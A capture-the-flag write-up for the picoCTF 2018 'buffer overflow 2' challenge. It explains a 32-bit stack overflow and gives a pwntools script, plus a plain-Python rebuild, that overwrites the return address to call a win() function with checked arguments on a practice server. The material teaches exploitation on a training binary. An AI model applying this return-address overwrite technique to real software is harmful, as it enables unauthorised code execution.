picoctf_2018_buffer overflow 2
Check the binary's protections: it is 32-bit.
The overflow on the stack is obvious.
There is a win function that prints the flag.
Putting it together: overflow the stack, return into win, and pass it the arguments that satisfy its check.
from pwn import *
p=remote('node4.buuoj.cn',25086)
#context.terminal = ['tmux', 'splitw', '-h']
elf=ELF('./PicoCTF_2018_buffer_overflow_2')
win=0x080485CB          # address of win()
a1=0xDEADBEEF           # first argument win() checks
a2=0xDEADC0DE           # second argument win() checks
payload=b'a'*(0x6c+4)   # filler up to the saved return address (buffer + saved EBP)
payload+=p32(win)       # overwrite the saved return address with win()
payload+=b'a'*4         # fake return address for win() (32-bit cdecl: args follow it)
payload+=p32(a1)        # arg1
payload+=p32(a2)        # arg2
p.sendline(payload)
p.interactive()
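To make the 32-bit cdecl frame explicit, here is an added example (not part of the original writeup) that builds the same payload without pwntools and reads it back the way the CPU sees it after the overflowed function's ret; the fake return address value 0x41414141 is an assumption standing in for the writeup's b'a'*4.

```python
import struct


def p32(value):
    """Little-endian 32-bit pack, equivalent to pwntools' p32 on x86 (assumption: 32-bit target)."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def build_ret2win_payload(offset, win, args, fake_ret=0x41414141):
    """Lay out a return-to-function frame for a 32-bit cdecl target.

    When the overflowed function executes `ret`, the CPU pops `win` into EIP and
    ESP then points at `fake_ret`. win() therefore sees the stack exactly as if
    it had been called normally: [return address][arg1][arg2]...
    """
    payload = b"a" * offset        # filler: buffer + saved EBP
    payload += p32(win)            # overwrites the saved return address
    payload += p32(fake_ret)       # where win() would return (assumed dummy value)
    for arg in args:               # arguments in cdecl order, left to right
        payload += p32(arg)
    return payload


def decode_frame(payload, offset, nargs):
    """Sanity check before sending: decode the frame the way win() will read it."""
    words = struct.unpack_from("<%dI" % (2 + nargs), payload, offset)
    return {"eip": words[0], "fake_ret": words[1], "args": list(words[2:])}


# Values taken from the writeup above.
OFFSET = 0x6c + 4
WIN = 0x080485CB
ARGS = [0xDEADBEEF, 0xDEADC0DE]
PAYLOAD = build_ret2win_payload(OFFSET, WIN, ARGS)
```

Decoding the frame back before sending catches off-by-one filler lengths and byte-order mistakes, which are the usual reasons a ret2win payload silently crashes instead of landing in win().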